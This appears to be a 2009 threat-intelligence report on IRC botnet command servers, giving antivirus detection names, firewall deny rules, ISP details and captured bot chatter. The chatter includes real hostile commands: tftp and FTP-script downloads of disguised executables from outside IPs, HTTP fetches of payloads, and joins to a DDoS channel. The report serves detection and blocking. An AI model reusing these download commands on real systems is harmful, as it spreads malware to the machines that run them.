AhnLab-V3	IRCBot.Gen
AntiVir	TRATRAPS.Gen
Authentium	MISSED
Avast	_DCom-F
AVG	SHeur2.AOLW
BitDefender	Generic.Mydoom.F72197F1
CAT-QuickHeal	Agent.gen
ClamAV	MISSED
DrWeb	HLLW.Piabot.origin
eSafe	MISSED
eTrust-Vet	IRCBot.PJ
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Kolabc.gza
Ikarus	Exploit.MS06040
Kaspersky	Kolabc.gza
McAfee	Spybot.worm!l
Microsoft	Exploit_MS06040.gen
NOD32v2	MISSED
Norman	Atraps.MQB
Panda	TrjCI.A
Prevx1	MISSED
Rising	MISSED
Sophos	MalBehav-004
Sunbelt	MISSED
Symantec	Spybot.Worm
TheHacker	MISSED
TrendMicro	SPYBOT.BIM
VBA32	MISSED
VirusBuster	RBot.Gen.3
Webwasher Gateway	MISSED

Priority 2	TCP Ports 65520	Filter deny ip host 193.104.94.11 any log ! 2 infects 11/05/09 to 11/05/09 ipaper.com	ISP block for pi assignments
Clients 2	united kingdom	Activity	Domain ipaper.com

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 118.221.35.162 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 118.221.35.162 get dllhost.exe wins\\DLLHOST.EXE
Client: NICK biymeivyUSER p020500 . . :-
Client: Service Pack 2JOIN &virtu
Server: :u. PRIVMSG biymeivy :!get http:/sleepatnight.cn/oc/box.txt
Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
Server: GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept:...
Server: GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRDldr.Agent.LF
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	Inject.6445
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Krap.AH
F-Prot	MISSED
F-Secure	Suspicious_Malware!Gemini
Ikarus	Packed.Krap
Kaspersky	Packed.Krap.ah
McAfee	MISSED
Microsoft	VirTool_Obfuscator.HG
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	Packed.Generic.258
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 2	TCP Ports 2569 3938	Filter deny ip host 89.149.227.51 any log ! 2 infects 10/16/09 to 10/17/09 internetserviceteam.com	ISP netdirekt e.k
Clients 2	germany	Activity	Domain internetserviceteam.com

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 113.253.112.208 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 113.253.112.208 get dllhost.exe wins\\DLLHOST.EXE
Client: USER smpbcb smpbcb smpbcb :gywmthsyspraopyh
Client: NICK tiHIjEan
Server: :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
Server: :irc.foonet.com NOTICE AUTH :*** Couldn\\'t resolve your...
Client: MODE tiHIjEan +xi
Server: File is missing:tiHIjEan MODE tiHIjEan :+iwx
Client: JOIN ##russia## USERHOST tiHIjEan
Client: MODE ##russia## +smntu
Client: GET /dive.exe HTTP/1.0Host: 89.149.227.51

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	Palevo.jur.20
Authentium	MISSED
Avast	_Trojan-gen
AVG	Dropper.Generic.AYVO
BitDefender	Generic.2518038
CAT-QuickHeal	Agent.ATV
ClamAV	MISSED
DrWeb	IRC.Sdbot.5190
eSafe	TrojanProxyRan
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	PossibleThreat
F-Prot	MISSED
F-Secure	MISSED
Ikarus	Pushbot
Kaspersky	P2P-Palevo.jur
McAfee	Autorun.aah
Microsoft	Malagent
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MalGeneric-A
Sunbelt	MISSED
Symantec	IRCBot
TheHacker	MISSED
TrendMicro	TROJ_AGENT.ICZZ
VBA32	Kolab.ear
VirusBuster	P2P.Palevo.EAN
Webwasher Gateway	MISSED

Priority 1	TCP Ports 3305	Filter deny ip host 212.54.2.171 any log ! 1 infects 10/30/09 to 10/30/09 megabaud.fi	ISP elisa oyj
Clients 1	finland	Activity	Domain megabaud.fi

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 202.157.56.125 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 202.157.56.125 get dllhost.exe wins\\DLLHOST.EXE
Client: PASS secretpass
Client: NICK P|nold11864USER zspnyxd3k * 0 :USA|2K|633
Server: :hub.35869.net 001 P|nold11864...
Client: USERHOST P|nold11864
Server: :hub.35869.net 302 P|nold11864...
Client: USERHOST P|nold11864MODE P|nold11864 JOIN #mm RSA
Client: PRIVMSG #mm...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	IRCBot.variant
AntiVir	TRDropper.Gen
Authentium	Threat-HLLIYE!Eldorado
Avast	_DCom-F
AVG	Heur
BitDefender	Packer.Yoda.A
CAT-QuickHeal	IRCBot.idc
ClamAV	MISSED
DrWeb	HLLW.Piabot
eSafe	TRDropper
eTrust-Vet	IRCBot.KU
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	PossibleThreat
F-Prot	Threat-HLLIYE!Eldorado
F-Secure	IRCBot.idc
Ikarus	Exploit.MS06040
Kaspersky	IRCBot.idc
McAfee	MISSED
Microsoft	Exploit_MS06040.gen
NOD32v2	MISSED
Norman	Smalltroj.MTNE
Panda	Gaobot.OXI.worm
Prevx1	MISSED
Rising	MS06-040.b
Sophos	MalPacker
Sunbelt	Wootbot.gen
Symantec	Spybot.Worm
TheHacker	BackdoorIRCBot.idc
TrendMicro	TROJ_LSADCOM.MCL
VBA32	Kolabc.gco
VirusBuster	IRCBot.AAWX
Webwasher Gateway	MISSED

Priority 1	TCP Ports 6669	Filter deny ip host 93.156.203.49 any log ! 1 infects 07/16/09 to 07/16/09 cm-93-156-61-10.telecable.es	ISP telecable
Clients 1	spain	Activity	Domain cm-93-156-61-10.telecable.es

Chatter Example

Client: USER 1
Server: 331 Password required
Client: PASS 1
Server: 230 User logged in.
Server: RETR javaflash.exe
Server: 150 Opening BINARY mode data connection
Server: 221 Goodbye happy r00ting.
Client: NICK USA|5502108USER veitija 0 0 :USA|5502108
Server: :fart.bitchassness.shit NOTICE USA|5502108 :*** If you are having...
Server: PONG :C5777CD6
Client: JOIN ##!cyber whores
Client: USERHOST USA|5502108MODE USA|5502108 +xiJOIN ##!cyber...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Virut.B
AntiVir	Virut.AX
Authentium	Virut.7116
Avast	_Virtob
AVG	Virut
BitDefender	Virtob.8.Gen
CAT-QuickHeal	Virut.Z
ClamAV	Virut-54
DrWeb	Poison.686
eSafe	MISSED
eTrust-Vet	Virut.7115
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Virut.AV
F-Prot	Virut.7116
F-Secure	Virut.av
Ikarus	Virut.av
Kaspersky	Virut.av
McAfee	Virut.gen.a
Microsoft	Virut.AC
NOD32v2	MISSED
Norman	Virut.AG
Panda	Virutas.FG
Prevx1	MISSED
Rising	Virut.an
Sophos	Virut-W
Sunbelt	MISSED
Symantec	Virut.W
TheHacker	Virut.av
TrendMicro	PE_VIRUT.AV
VBA32	Virut.2
VirusBuster	Virut.Gen.4
Webwasher Gateway	MISSED

Priority 1	TCP Ports 3305	Filter deny ip host 62.128.152.250 any log ! 1 infects 08/03/09 to 08/03/09 calnea.com	ISP _ netbenefit dedicated servers sovereign house_
Clients 1	united kingdom	Activity	Domain calnea.com

Chatter Example

Client: USER xxcupq
Server: echo open 130.15.63.51 54236 >> asr_xxcup &echo user xxcupq...
Client: PASS xxcupq
Client: user xxcupq xxcupq 331230
Server: RETR asr_41061.exe
Client: PASS secretpass
Client: NICK P|qvb4xgt76USER eek6x2dlg * 0 :USA|XP|058
Server: :hub.58835.net 001 P|qvb4xgt76...
Client: USERHOST P|qvb4xgt76
Server: :hub.58835.net 302 P|qvb4xgt76...
Client: USERHOST P|qvb4xgt76MODE P|qvb4xgt76 JOIN #mm RSA
Server: PING :hub.58835.net
Server: PONG hub.58835.net
Server: PING :hub.58835.net
Server: PONG hub.58835.net
Server: PING :hub.58835.net
Server: PONG hub.58835.net
Server: PING :hub.58835.net
Server: PONG hub.58835.net

more....

BotClient Antivirus Diagnoses

AhnLab-V3	IRCBot.Gen
AntiVir	TRATRAPS.Gen
Authentium	MISSED
Avast	_DCom-F
AVG	SHeur2.AOLW
BitDefender	Generic.Mydoom.F72197F1
CAT-QuickHeal	Agent.gen
ClamAV	MISSED
DrWeb	HLLW.Piabot.origin
eSafe	MISSED
eTrust-Vet	IRCBot.PJ
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Kolabc.gza
Ikarus	Exploit.MS06040
Kaspersky	Kolabc.gza
McAfee	Spybot.worm!l
Microsoft	Exploit_MS06040.gen
NOD32v2	MISSED
Norman	Atraps.MQB
Panda	TrjCI.A
Prevx1	MISSED
Rising	MISSED
Sophos	MalBehav-004
Sunbelt	MISSED
Symantec	Spybot.Worm
TheHacker	MISSED
TrendMicro	SPYBOT.BIM
VBA32	MISSED
VirusBuster	RBot.Gen.3
Webwasher Gateway	MISSED

Priority 1	TCP Ports 7575	Filter deny ip host 218.10.16.78 any log ! 1 infects 07/01/09 to 07/01/09 -	ISP china unicom heilongjiang province network
Clients 1	china	Activity	Domain -

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 113.252.244.40 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 113.252.244.40 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 113.252.244.40 get dllhost.exe wins\\DLLHOST.EXE
Client: USER ziucwj ziucwj ziucwj :jrmsiaivxwuejgkz
Client: NICK knCcrgnd
Server: :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
Server: :irc.foonet.com NOTICE AUTH :*** Couldn\\'t resolve your...
Server: Ccrgnd :MOTD File is missing:knCcrgnd MODE knCcrgnd :+iwx
Client: MODE knCcrgnd +xi
Client: JOIN ##russia## USERHOST knCcrgnd
Client: MODE ##russia## +smntu
Client: GET /datafinal.exe HTTP/1.0Host: hi5-gallerys.com
Server: GET /nas.exe HTTP/1.0Host: 220.196.42.160

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	IRC.Sdbot.4924
eSafe	MISSED
eTrust-Vet	Slenfbot!generic
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	IRCBot.kzu
Ikarus	MISSED
Kaspersky	IRCBot.kzu
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 1	TCP Ports 18067	Filter deny ip host 123.164.66.62 any log ! 1 infects 06/30/09 to 06/30/09 163data.com.cn	ISP chinanet heilongjiang province network
Clients 1	china	Activity	Domain 163data.com.cn

Chatter Example

Client: USeR l l l l
Client: NiCK l5-000cf7d3
Client: PoNG :B5467810
Server: :a 001 l5-000cf7d3 :l5-000cf7d3 MODE l5-000cf7d3 :+i
Client: USeRHOST l5-000cf7d3
Client: JOiN #l5t3 dlrowymx0ri
Server: :l5-000cf7d3!l@192.168.1.128 JOIN :#l5t3

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	MISSED
Ikarus	MISSED
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 1	TCP Ports 6667	Filter deny ip host 38.97.225.135 any log ! 1 infects 10/29/09 to 10/29/09 cogentco.com	ISP psinet inc
Clients 1	united states	Activity	Domain cogentco.com

Chatter Example

Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.16.201.41:7314
Server: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.16.201.41:7314

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Parite
AntiVir	Parite
Authentium	Korgo.V
Avast	_Parite
AVG	Korgo.A
BitDefender	Padobot.BV.Dam
CAT-QuickHeal	Perite.B
ClamAV	Padobot.M
DrWeb	Lsabot
eSafe	_Parite_B
eTrust-Vet	Pinfi.A
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Parite.B
F-Prot	Korgo.V
F-Secure	Padobot.BV.Dam
Ikarus	Padobot.M
Kaspersky	Padobot.m
McAfee	Pate.b
Microsoft	Korgo.V
NOD32v2	MISSED
Norman	Korgo.V
Panda	Korgo.U.worm
Prevx1	MISSED
Rising	Parite.b
Sophos	Parite-B
Sunbelt	MISSED
Symantec	Pinfi
TheHacker	Pate.B
TrendMicro	PE_PARITE.A
VBA32	Parite.B
VirusBuster	Padobot.D
Webwasher Gateway	MISSED

Priority 1	TCP Ports 3308	Filter deny ip host 217.30.180.76 any log ! 1 infects 10/15/09 to 10/15/09 nebula.fi	ISP nebula oy. web hosting pri-dns and streaming
Clients 1	finland	Activity	Domain nebula.fi

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 125.4.228.60 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 125.4.228.60 get dllhost.exe wins\\DLLHOST.EXE
Client: PASS secretpass
Client: NICK P|m80s5khyjUSER e5idmiq5g * 0 :USA|2K|865
Server: :hub.82.net 001 P|m80s5khyj...
Client: USERHOST P|m80s5khyj
Server: :hub.82.net 302 P|m80s5khyj :P|m80s5khyj=+e5idmiq5g@192.168.1.209
Client: USERHOST P|m80s5khyjMODE P|m80s5khyj JOIN #mm RSA
Client: PRIVMSG #mm...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Virut.B
AntiVir	Virut.AX
Authentium	Virut.7116
Avast	_Virtob
AVG	Virut
BitDefender	Virtob.8.Gen
CAT-QuickHeal	Virut.Z
ClamAV	Virut-54
DrWeb	Virut.30
eSafe	MISSED
eTrust-Vet	Virut.7115
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Virut.AV
F-Prot	Virut.7116
F-Secure	Virut.av
Ikarus	Kolabc
Kaspersky	Virut.av
McAfee	Virut.gen.a
Microsoft	Virut.AC
NOD32v2	MISSED
Norman	Virut.AG
Panda	Virutas.FG
Prevx1	MISSED
Rising	Virut.an
Sophos	Virut-W
Sunbelt	MISSED
Symantec	Virut.W
TheHacker	Virut.av
TrendMicro	PE_VIRUT.AV
VBA32	Virut.2
VirusBuster	Virut.Gen.4
Webwasher Gateway	MISSED

Priority 1	TCP Ports 5555	Filter deny ip host 200.204.157.111 any log ! 1 infects 07/11/09 to 07/11/09 sterlingstudents.net	ISP comite gestor da internet no brasil
Clients 1	brazil	Activity	Domain sterlingstudents.net

Chatter Example

Client: NICK USA|3073090USER fpybefnye 0 0 :USA|3073090
Server: :HTTP1.4 NOTICE AUTH :*** eh...
Server: :HTTP1.4 001 USA|3073090 :HTTP1.4 002 USA|3073090 :HTTP1.4 003...
Client: USERHOST USA|3073090
Client: MODE USA|3073090 -x+iJOIN #ddos# drenyUSERHOST USA|3073090MODE...
Server: :USA|3073090!fpybefnye@192.168.1.150 JOIN :#ddos#:HTTP1.4 332...
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4
Client: JOIN #ddos# dreny
Server: PONG :HTTP1.4

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	MISSED
Ikarus	MISSED
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 1	TCP Ports 80 216	Filter deny ip host 97.74.144.31 any log ! 1 infects 10/14/09 to 10/14/09 jws.com	ISP godaddy.com inc
Clients 1	united states	Activity	Domain jws.com

Chatter Example

Server: echo off&echo open 91.66.198.112 1023>>cmd.ftp&echo...
Client: USER anonymous
Client: PASS bin
Server: RETR 12394_upload.exe
Client: GET /images/logos.gif?51dff=2347513 HTTP/1.0User-Agent: KUKU...
Server: GET /result?52552 HTTP/1.0User-Agent: Opera/9.00 (Windows NT 5.1;...
Server: GET /h2/mainh.gif?528fb=338171 HTTP/1.0User-Agent: KUKU v5.06exp...
Server: GET /images/logos.gif?531c5=680842 HTTP/1.0User-Agent: KUKU...
Server: GET /?342546 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...
Server: GET /h2/?s=938 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...
Server: GET / HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...
Server: GET /home_imag/mainf.gif?53e68=1718280 HTTP/1.0User-Agent: KUKU...
Server: GET /logos.gif?53fee=2752368 HTTP/1.0User-Agent: KUKU v5.06exp...
Server: GET /images/logos.gif?54bf5=1041375 HTTP/1.0User-Agent: KUKU...
Server: GET /images/mainf.gif?54df8=1738200 HTTP/1.0User-Agent: KUKU...
Server: GET /images/logos.gif?54ea4=3478120 HTTP/1.0User-Agent: KUKU...
Server: GET /images/logos.gif?55aaa=2105340 HTTP/1.0User-Agent: KUKU...
Server: GET /utest/?jutr=31444&oo=2&57835=264973&ra=0 HTTP/1.0User-Agent:...
Server: GET /test/gewtghywa.dat HTTP/1.0X-Forwarded-For:...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Kashu.B
AntiVir	Sality.Y
Authentium	Sasser.E
Avast	_Sality
AVG	I-Sasser.E
BitDefender	Generic.24440
CAT-QuickHeal	Sality.R
ClamAV	Sasser.H
DrWeb	Sector.5
eSafe	MISSED
eTrust-Vet	Sality.AA
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Sality.AA
F-Prot	Sasser.E
F-Secure	Sasser.D
Ikarus	Email-Plexus.E
Kaspersky	Sality.aa
McAfee	Sality.gen
Microsoft	Sality.AM
NOD32v2	MISSED
Norman	Sasser.E
Panda	Sasser.E.worm
Prevx1	MISSED
Rising	KUKU.GEN
Sophos	Sality-AM
Sunbelt	MISSED
Symantec	Sality.AE
TheHacker	Sality.gen
TrendMicro	PE_SALITY.EN
VBA32	Sality.kaka
VirusBuster	Sasser.E
Webwasher Gateway	MISSED

Priority 1	TCP Ports 80	Filter deny ip host 194.67.57.20 any log ! 1 infects 09/03/09 to 09/03/09 mail.ru	ISP sovintel-msk-netbridge-ervices-net
Clients 1	russian federation	Activity	Domain mail.ru

Chatter Example

Client: GET /lsd HTTP/1.0User-Agent: bHost: 66.220.226.83:50929
Server: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRDropper.Gen
Authentium	Heuristic-MUP!Eldorado
Avast	_Padobot-D@UPX
AVG	MISSED
BitDefender	Generic.69904
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	WormPoxdar.A.D
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	Heuristic-MUP!Eldorado
F-Secure	MISSED
Ikarus	MISSED
Kaspersky	MISSED
McAfee	MISSED
Microsoft	Poxdar.A
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MalHckPk-E
Sunbelt	MISSED
Symantec	Poxdar
TheHacker	MISSED
TrendMicro	PAK_Generic.001
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED